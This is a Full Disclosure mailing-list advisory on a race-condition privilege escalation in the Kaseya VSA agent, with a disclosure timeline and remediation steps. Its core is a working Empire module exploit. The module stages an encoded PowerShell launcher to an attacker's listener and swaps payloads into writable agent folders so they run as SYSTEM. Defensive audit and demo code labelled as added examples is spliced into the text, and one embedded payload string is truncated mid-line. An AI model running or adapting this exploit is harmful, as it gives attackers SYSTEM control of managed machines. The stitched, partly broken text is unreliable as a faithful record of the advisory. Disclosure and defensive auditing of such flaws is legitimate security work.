
List:       full-disclosure
Subject:    [FD] Kaseya AgentMon.exe <= 9.3.0.11 - Local Privilege Escalation
From:       x ksi <s3810 () pjwstk ! edu ! pl>
Date:       2018-03-22 13:23:49
Message-ID: CAN10O-bVpWsD422Td2ODcxSjaC=QhZgGLcXz1LF09KK=w_4DZg () mail ! gmail ! com

Hey,

A local privilege escalation vulnerability was found in the Kaseya
Virtual System Administrator (VSA) [1] agent "AgentMon.exe". The agent is a
Windows service that periodically executes various programs with "NT
AUTHORITY\SYSTEM" privileges.

In Kaseya's default configuration, Windows users who belong to the
"Authenticated Users" group can modify files residing in the agent's
working and temporary directories, e.g.:
  - "HKLM\SOFTWARE\Kaseya\Agent\...\TempPath"
  - "C:\Temp"
  - "C:\kworking"
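
An audit check for the directory permissions described above, as an added example that is not part of the original advisory. It parses text in the format printed by the Windows `icacls <directory>` command; the function name and the sample output are constructed for illustration.

```python
import re

# Principals every ordinary local user is a member of (compared lower-case).
LOW_PRIV = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls permission tokens that allow creating or replacing files:
# F full, M modify, W write, WD write data/add file, AD append data/add
# subdirectory, DC delete child, GW generic write, GA generic all.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "GW", "GA"}


def writable_aces(path, icacls_text):
    """Return (principal, rights) pairs for allow-ACEs that give a
    low-privileged principal write access to `path` or the files in it."""
    findings = []
    for line in icacls_text.splitlines():
        # The first output line is prefixed with the path itself, which
        # contains ':' (drive letter), so remove it before parsing.
        if line.lower().startswith(path.lower()):
            line = line[len(path):]
        line = line.strip()
        sep = line.find(":(")
        if sep == -1:
            continue  # blank line or the "Successfully processed" summary
        principal = line[:sep]
        groups = re.findall(r"\(([^)]*)\)", line[sep + 1:])
        tokens = {t.strip().upper() for g in groups for t in g.split(",")}
        if "DENY" in tokens:
            continue  # deny ACEs restrict access, they never grant it
        granted = sorted(tokens & WRITE_RIGHTS)
        if principal.lower() in LOW_PRIV and granted:
            findings.append((principal, granted))
    return findings


# Constructed sample: the weak default described in the advisory.
SAMPLE_WEAK = (
    "C:\\kworking NT AUTHORITY\\Authenticated Users:(OI)(CI)(M)\n"
    "            NT AUTHORITY\\SYSTEM:(OI)(CI)(F)\n"
    "            BUILTIN\\Administrators:(OI)(CI)(F)\n"
    "\n"
    "Successfully processed 1 files; Failed processing 0 files\n"
)

# Constructed sample: the same directory after write access was removed.
SAMPLE_LOCKED = (
    "C:\\kworking NT AUTHORITY\\SYSTEM:(OI)(CI)(F)\n"
    "            BUILTIN\\Administrators:(OI)(CI)(F)\n"
    "            BUILTIN\\Users:(OI)(CI)(RX)\n"
    "            BUILTIN\\Users:(DENY)(CI)(WD,AD)\n"
)

if __name__ == "__main__":
    for label, text in (("weak", SAMPLE_WEAK), ("locked", SAMPLE_LOCKED)):
        print(label, writable_aces("C:\\kworking", text))
```
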

The list of executables that are stored in these directories and are run by
the agent includes, but is not limited to:
  - "C:\kworking\NetUserStateAudit.exe"
  - "C:\kworking\KLicense.exe"
  - "C:\Temp\kwami.dll"

Before running the executables, the VSA agent verifies whether the files
were modified. If they were, it restores them to their known-good
originals. However, this process suffers from a Time of Check to Time of
Use (TOCTOU) issue: it is possible to win a race condition and run
arbitrary executables with "NT AUTHORITY\SYSTEM" privileges.
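
The check-then-use pattern described above next to a hardened form, as an added example that is not code from the advisory or from Kaseya. The advisory does not say how the agent verifies files, so the SHA-256 comparison, the function names and the `window` callback are assumptions, and reading the file's bytes stands in for executing it.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def use_after_path_check(path, known_good, window=None):
    """Check-then-use on a path inside a directory other users can write to.

    `window` is a callback that runs between the check and the use; it
    models whatever another process does during that gap.
    """
    if sha256_file(path) != known_good:          # time of check
        raise ValueError("file was modified")
    if window:
        window()
    with open(path, "rb") as f:                  # time of use: path re-resolved
        return f.read()                          # stands in for "execute it"


def use_private_copy(path, known_good, private_dir, window=None):
    """Copy into a directory only the service can write, then check and use
    that copy. Changes to the shared path after the copy have no effect."""
    private = os.path.join(private_dir, os.path.basename(path))
    shutil.copyfile(path, private)
    if sha256_file(private) != known_good:
        os.remove(private)
        raise ValueError("file was modified")
    if window:
        window()
    with open(private, "rb") as f:
        return f.read()


def demo():
    shared = tempfile.mkdtemp(prefix="shared-")    # plays the user-writable dir
    private = tempfile.mkdtemp(prefix="private-")  # mkdtemp: owner-only access
    target = os.path.join(shared, "tool.bin")
    good = b"known-good image"
    digest = hashlib.sha256(good).hexdigest()

    def write(data):
        with open(target, "wb") as f:
            f.write(data)

    try:
        results = {}
        write(good)
        results["by_path"] = use_after_path_check(
            target, digest, window=lambda: write(b"replaced"))
        write(good)
        results["private_copy"] = use_private_copy(
            target, digest, private, window=lambda: write(b"replaced"))
        # A file already replaced before the copy is rejected by the check.
        try:
            use_private_copy(target, digest, private)
            results["pre_replaced"] = "accepted"
        except ValueError:
            results["pre_replaced"] = "rejected"
        return results
    finally:
        shutil.rmtree(shared)
        shutil.rmtree(private)


if __name__ == "__main__":
    print(demo())
```
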

The PoC exploiting this vulnerability is included below. The PoC is an
Empire module (https://github.com/EmpireProject/Empire) and it currently
supports exploitation by replacing one of the following files:
  - "C:\kworking\NetUserStateAudit.exe" ($exe in PoC)
  - "C:\Temp\kwami.dll" ($dll in PoC)

--
$ cat > kaseya.py << EOF
from lib.common import helpers

class Module:
  def __init__(self, mainMenu, params=[]):
    self.info = {
      'Name': 'Kaseya AgentMon.exe <= 9.3.0.11 - Local Privilege Escalation',
      'Author': ['Filip.Palian@pjwstk.edu.pl'],
      'Description': (
        'It\'s possible to exploit TOCTOU vulnerability in Kaseya '
        'AgentMon.exe service by winning a race condition when it tries '
        'to execute binaries from its working and/or temp folder.'),
      'Background': False,
      'OutputExtension': None,
      'OpsecSafe': False,
      'Language' : 'python',
      'NeedsAdmin' : False,
      'MinLanguageVersion' : '2.6',
      'Comments': [
        'http://kaseya.com/'
      ]
    }

    self.options = {
      'Agent': {
          'Description' : 'Agent to run on.',
          'Required'    : True,
          'Value'       : ''
      },
      'Listener' : {
          'Description' : 'Listener to use.',
          'Required'    : True,
          'Value'       : ''
      },
      'UserAgent' : {
          'Description' : 'User-agent string to use for the staging ' \
                            + 'request (default, none, or other).',
          'Required'    : False,
          'Value'       : 'default'
      },
      'Proxy' : {
          'Description' : 'Proxy to use for request (default, none, or ' \
                            + 'other).',
          'Required'    : False,
          'Value'       : 'default'
      },
      'ProxyCreds' : {
          'Description' : 'Proxy credentials ([domain\]username:' \
                            + 'password) to use for request (default, ' \
                            + 'none, or other).',
          'Required'    : False,
          'Value'       : 'default'
      },
      'Executable': {
          'Description' : 'Name of the executable to replace in working ' \
                            + 'folder (default or other).',
          'Required'    : False,
          'Value'       : 'default'
      },
      'Path': {
          'Description' : 'Working or temp folder to use (default, work, ' \
                            + 'temp).',
          'Required'    : False,
          'Value'       : 'default'
      },
    }

    self.mainMenu = mainMenu

    if params:
      for param in params:
        option, value = param
        if option in self.options:
          self.options[option]['Value'] = value

  def generate(self):
      listenerName = self.options['Listener']['Value']
      userAgent = self.options['UserAgent']['Value']
      proxy = self.options['Proxy']['Value']
      proxyCreds = self.options['ProxyCreds']['Value']
      execName = self.options['Executable']['Value']
      path = self.options['Path']['Value']

      if not self.mainMenu.listeners.is_listener_valid(listenerName):
        print helpers.color("[!] Invalid listener: " + listenerName)
        return ""
      else:
        launcher = self.mainMenu.stagers.generate_launcher(
          listenerName,
          language='powershell',
          encode=True,
          userAgent=userAgent,
          proxy=proxy,
          proxyCreds=proxyCreds
        )

        if launcher == "":
            print helpers.color("[!] Error in launcher generation.")
            return ""
        else:
            encLauncher = " ".join(launcher.split(" ")[1:])

            script = '''
\$exe = "[base64-encoded PE executable omitted]"


\$dll = "[base64-encoded PE DLL omitted] \
yTzJaMoEyiDLnMgU0RzRSNFg0bDR1NIU0jjS8NEQ1UDVoNYU1qzW8Nfc1DzYpNmE2czZ/NpY2pjayNsw24TbyNgg3Jjc7N0w \
3VDdcN2s3jjeUN7g3yDfZN9434zfrN/A3+DcBOAs4ETgaOCs4lzikOMQ4yThFOWA5fTmoObY59DklOjI6Vzp0OoE6ljqdOqs \

\$path_opt = "%s"
\$exec_opt = "%s"

if (\$path_opt.compareTo("work") -eq 0) {
  if (\$exec_opt.compareTo("default") -eq 0) {
    \$exec_opt = "NetUserStateAudit.exe"
  }
  \$uid = Get-ChildItem "hklm:\SOFTWARE\Kaseya\Agent" -Name
  \$path = Get-ItemPropertyValue "hklm:\SOFTWARE\Kaseya\Agent\\$uid" `
    -Name TempPath
  [io.file]::WriteAllBytes(
    "\$path\kaseya.exe",
    [System.Convert]::FromBase64String(\$exe)
  )
  "powershell.exe %s" > "\$path\kaseya.ps1"
  Remove-Item "\$path\kaseya.bat"
  Add-Content "\$path\kaseya.bat" "cd \$path"
  Add-Content "\$path\kaseya.bat" ":l"
  Add-Content "\$path\kaseya.bat" "copy kaseya.exe \$exec_opt"
  Add-Content "\$path\kaseya.bat" "goto l"
} else {
  if (\$exec_opt.compareTo("default") -eq 0) {
    \$exec_opt = "kawmi.dll"
  }
  \$path = "C:\\temp"
  [io.file]::WriteAllBytes(
    "\$path\kaseya.dll",
    [System.Convert]::FromBase64String(\$dll)
  )
  Remove-Item "\$path\kaseya.bat"
  Add-Content "\$path\kaseya.bat" "cd \$path"
  Add-Content "\$path\kaseya.bat" ":l"
  Add-Content "\$path\kaseya.bat" "copy kaseya.dll \$exec_opt"
  Add-Content "\$path\kaseya.bat" "goto l"
}

# TODO: add check if we already won a race and kill the loop
Start-Process "\$path\kaseya.bat"

#while(1) {
#  try {
#    # FIXME: test Copy-Item to make it opsec safe
#    #Copy-Item "\$path\kaseya.exe"  "\$path\NetUserStateAudit.exe" `
#    #-ErrorAction SilentlyContinue
#    Copy-Item "\$path\kaseya.exe" "\$path\NetUserStateAudit.exe"
#  } catch [System.Exception] {
#    continue
#  }
#}

''' % (path, execName, encLauncher)

      return script
EOF
--

Remediation:
- Restrict permissions for users who can modify directories and files used
  by the Kaseya VSA.
- Contact vendor for details.
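
One way to check a host against the first remediation item, as an added example (not part of the original advisory and not Kaseya tooling): a PowerShell audit that lists allow ACEs granting broad principals write-type rights on the directories named above and on the executables in them. The function name Get-WeakAce and the set of flagged principals are assumptions made for this example.

```powershell
# Well-known SIDs of broad, low-privileged principals (locale independent).
$broad = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}
# Rights that let a principal create, replace or re-ACL files the agent later runs.
$write = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$generic = 0x50000000   # GENERIC_WRITE | GENERIC_ALL, kept as raw bits in inherit-only ACEs

# Directories named in the advisory, plus each agent's TempPath registry value.
$dirs = @('C:\Temp', 'C:\kworking')
$agentKey = 'HKLM:\SOFTWARE\Kaseya\Agent'
if (Test-Path $agentKey) {
    foreach ($k in Get-ChildItem $agentKey) {
        $tp = (Get-ItemProperty -Path $k.PSPath -Name TempPath -ErrorAction SilentlyContinue).TempPath
        if ($tp) { $dirs += $tp }
    }
}

function Get-WeakAce {
    param([string[]]$Directory)
    foreach ($dir in ($Directory | Sort-Object -Unique)) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
        # Check the directory itself and the executables currently stored in it.
        $items = @(Get-Item -LiteralPath $dir) +
                 @(Get-ChildItem -LiteralPath $dir -File | Where-Object { $_.Extension -in '.exe', '.dll' })
        foreach ($item in $items) {
            $acl = Get-Acl -LiteralPath $item.FullName
            $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
            foreach ($ace in $rules) {
                $sid = $ace.IdentityReference.Value
                if ($ace.AccessControlType -ne 'Allow' -or -not $broad.ContainsKey($sid)) { continue }
                $rights = [int]$ace.FileSystemRights
                if (($rights -band [int]$write) -or ($rights -band $generic)) {
                    [pscustomobject]@{
                        Path   = $item.FullName; Principal = $broad[$sid]
                        Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited
                    }
                }
            }
        }
    }
}

Get-WeakAce -Directory $dirs | Format-Table -AutoSize -Wrap
```

Each row returned is an ACE to remove or narrow; an empty result means none of the flagged principals hold write-type rights on those paths.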

Timeline:
03.08.2017: Initial contact email sent to security@kaseya.com with
            information about the vulnerability.
03.08.2017: Notification sent to vendor that CVE-2017-12410 has been
            assigned for this vulnerability by MITRE.
05.08.2017: Vendor confirms receiving the information about the
            vulnerability and informs that the development team is looking
            into the issue.
19.11.2017: No vendor response. Request for a status update.
10.02.2018: No vendor response. Notifying vendor about the planned advisory
            release.
11.02.2018: Vendor replies with information that the fix is ready and that
            they are in the process of backporting it across three versions
            of their code, testing it, releasing patches and rolling it out
            across their sass (sic!) versions. Vendor requests to postpone
            publication of the advisory for 30 days to ensure that patches
            are tested and ready for release.
12.02.2018: Confirmation sent that the publication of the advisory will be
            postponed.
12.02.2018: Vendor acknowledges and commits to provide weekly updates as
            they progress to release.
20.03.2018: No vendor response. Advisory published.
23.03.2018: The advisory is released.

References:
[1] https://www.kaseya.com/products/vsa

Acknowledgments:
- Mike Puglia (Kaseya)
- Niket Khosla (Telstra)
- Telstra BTS Security Services (redteamnsw@team.telstra.com)


Thanks,
Filip Palian

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

